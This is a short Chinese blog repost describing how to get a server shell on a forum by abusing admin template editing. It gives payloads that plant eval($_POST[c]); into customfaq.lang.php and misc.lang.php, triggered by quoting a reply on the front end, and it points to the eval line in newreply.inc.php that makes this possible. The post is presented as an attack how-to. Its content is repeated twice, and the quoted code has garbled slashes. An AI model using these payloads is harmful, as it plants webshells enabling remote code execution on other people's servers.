本文介绍了一种通过后台编辑功能存在的安全漏洞来获取服务器SHELL的方法。具体操作包括编辑customfaq.lang.php文件中的customfaq及misc.lang.php文件中的misc,并通过特定代码注入实现远程代码执行。
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:)
1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
Copy code
eval("/$language[’post_reply_quote’] = /"$language[post_reply_quote]/";");
本文转自
http://hi.baidu.com/hack_ht/blog/item/57ce0c2afdca0a9e023bf68c.html
1.后台编辑customfaq(customfaq.lang.php文件)
在
Copy code
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
Copy code
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码:
include/newreply.inc.php 107行:
Copy code
eval("/$language[’post_reply_quote’] = /"$language[post_reply_quote]/";");
本文转自
http://hi.baidu.com/hack_ht/blog/item/57ce0c2afdca0a9e023bf68c.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
